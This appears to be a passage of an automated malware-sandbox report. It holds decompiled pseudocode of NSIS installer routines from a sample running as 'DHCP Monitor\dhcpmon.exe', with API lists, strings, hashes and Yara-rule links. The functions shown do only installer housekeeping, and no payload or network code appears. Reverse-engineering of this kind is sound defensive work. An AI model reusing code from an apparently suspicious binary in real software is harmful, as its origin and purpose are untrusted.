							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}

0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f72
0x00402f77
0x00402f79
0x00403067
0x00403069
0x00403075
0x00000000
0x00000000
0x0040307e
0x004030aa
0x004030b5
0x004030be
0x004030bf
0x004030c4
0x004030d5
0x004030db
0x004030e1
0x004030e7
0x004030f1
0x0040310c
0x00403115
0x0040311a
0x00403139
0x00403149
0x0040315b
0x00403160
0x00403168
0x00403175
0x0040317d
0x00403182
0x00403184
0x00403184
0x0040318a
0x0040318a
0x0040318d
0x0040318f
0x0040318f
0x00403191
0x00403193
0x00403193
0x0040319d
0x004031a9
0x00000000
0x004031ae
0x00000000
0x00403168
0x00000000
0x0040311c
0x00403086
0x00403098
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f7f
0x00402f84
0x00402f88
0x00402f8f
0x00402f96
0x00402f98
0x00402f98
0x00402fa7
0x00403128
0x0040316a
0x00000000
0x0040316a
0x00402fb3
0x00403037
0x0040303a
0x0040303f
0x00000000
0x00403037
0x00402fc0
0x00402fc5
0x00402fcd
0x00402ff3
0x00403002
0x00403008
0x0040300d
0x00403013
0x00000000
0x00000000
0x0040301d
0x00403025
0x00403028
0x0040302d
0x0040302f
0x0040302f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040301d
0x00403040
0x00403046
0x00403056
0x00403056
0x00403059
0x0040305f
0x0040305f
0x00000000
0x00402f7f

APIs

GetTickCount.KERNEL32 ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,00000400), ref: 00402F21

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF

Strings

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00402EF1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
C:\Program Files (x86)\DHCP Monitor, xrefs: 00402F4C, 00402F51, 00402F57
Null, xrefs: 00402FEA
soft, xrefs: 00402FE1
Inst, xrefs: 00402FD8
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
Error launching installer, xrefs: 00402F41

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$C:\Program Files (x86)\DHCP Monitor$C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-667432908
Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065ff
0x00406608
0x0040660a
0x0040660a
0x0040660e
0x00406620
0x0040661a
0x0040661a
0x0040661a
0x00406624
0x00406638
0x0040664c
0x00406653

APIs

GetSystemDirectoryA.KERNEL32 ref: 004065FF
wsprintfA.USER32 ref: 00406638
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Strings

%s%s.dll, xrefs: 00406632
UXTHEME, xrefs: 004065F1
\, xrefs: 00406610

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

APIs

GetTickCount.KERNEL32 ref: 00405E29
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43

Strings

"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00405E15
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
nsa, xrefs: 00405E20

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-232171295
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x41a964
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

APIs

GetTickCount.KERNEL32 ref: 004032D3

Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401

Strings

`TA, xrefs: 00403318

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID: `TA
API String ID: 1092082344-1754987364
Opcode ID: 3d13d1d14bea50cb7a84346b616f5d02e9ab79d37600768ca2325cb979edba2a
Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
Opcode Fuzzy Hash: 3d13d1d14bea50cb7a84346b616f5d02e9ab79d37600768ca2325cb979edba2a
Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

APIs

Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,7519FA90,?,7519F560,00405A35,?,7519FA90,7519F560,00000000), ref: 00405C8C
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040583A: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1943935188
Opcode ID: d300222a80fe589d7c409aaa2dc9a8870679af7cb65b336be68641a3b2763995
Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
Opcode Fuzzy Hash: d300222a80fe589d7c409aaa2dc9a8870679af7cb65b336be68641a3b2763995
Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E

Uniqueness

Uniqueness Score: -1.00%

Function 00405969, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405969(intOrPtr _a4, unsigned int _a8) {
				unsigned int _t3;
				int _t7;
				unsigned int _t8;
				signed int _t10;

				_t3 = _a8;
				_t10 = _t3 & 0x001fffff;
				if( *0x42f500 == 0) {
					L2:
					if( *0x42f508 != 0) {
						_t10 = _t10 ^ 0x00180000;
					}
					 *0x40a234 =  *0x42f448;
					 *0x40a238 =  *0x42f440;
					 *0x40a23c = _a4;
					 *0x40a240 = 0x42ec40;
					 *0x40a244 = _t10; // executed
					_t7 = MessageBoxIndirectA("("); // executed
					return _t7;
				}
				_t8 = _t3 >> 0x15;
				if(_t8 == 0) {
					goto L2;
				}
				return _t8;
			}

0x00405969
0x0040596f
0x0040597c
0x00405983
0x0040598a
0x0040598c
0x0040598c
0x0040599c
0x004059a6
0x004059af
0x004059b4
0x004059be
0x004059c4
0x00000000
0x004059c4
0x0040597e
0x00405981
0x00000000
0x00000000
0x004059ca

APIs

MessageBoxIndirectA.USER32 ref: 004059C4

Strings

Setup Setup, xrefs: 004059B4

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: IndirectMessage
String ID: Setup Setup
API String ID: 1874166685-1037079524
Opcode ID: 00a72194d7431dd90cc833c15a2df0ff8766ba406ab967dfdf96e8e3c192c053
Instruction ID: aa5d562c832b99d9798028195c670e8934f82b4d45d0c7c6d97b8a2015a1dd7d
Opcode Fuzzy Hash: 00a72194d7431dd90cc833c15a2df0ff8766ba406ab967dfdf96e8e3c192c053
Instruction Fuzzy Hash: 96F0F2B2610701DFC764DF18EA84B163BF0E719324F80817EE584A23A0D7B9849ACF4B

Uniqueness

Uniqueness Score: -1.00%

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0);
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										if(E00405E8D(_a8, 0x41d460, _v8) == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004031bb
0x004031c4
0x004031cd
0x004031d1
0x004031dc
0x004031dc
0x004031e4
0x004031eb
0x004031fd
0x00403204
0x004032a9
0x004032a9
0x00000000
0x0040320a
0x0040320d
0x00403219
0x0040321d
0x004032b7
0x004032b7
0x00403223
0x00403226
0x00403285
0x0040328b
0x0040328d
0x0040328d
0x0040329f
0x004032a7
0x004032ae
0x004032b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00403228
0x0040322b
0x00000000
0x00403231
0x00403236
0x0040323d
0x00403240
0x00403242
0x00403242
0x0040324f
0x00403259
0x00000000
0x00000000
0x00403269
0x00403281
0x004032ab
0x004032ab
0x0040326b
0x0040326b
0x0040326e
0x00403271
0x00403277
0x0040327d
0x00000000
0x0040327f
0x00000000
0x0040327f
0x0040327d
0x00000000
0x00403269
0x00000000
0x00403236
0x0040322b
0x00403226
0x0040321d
0x00403204
0x004032b9
0x004032bc

APIs

SetFilePointer.KERNEL32(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: fc26a755f646aae9f4b69ebd4f79a6bf72dbf4e01b0b4055b2eb183f4ae24420
Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
Opcode Fuzzy Hash: fc26a755f646aae9f4b69ebd4f79a6bf72dbf4e01b0b4055b2eb183f4ae24420
Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040665e
0x00406661
0x00406668
0x00406670
0x0040667c
0x00000000
0x00406683
0x00406673
0x0040667a
0x00000000
0x0040668b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
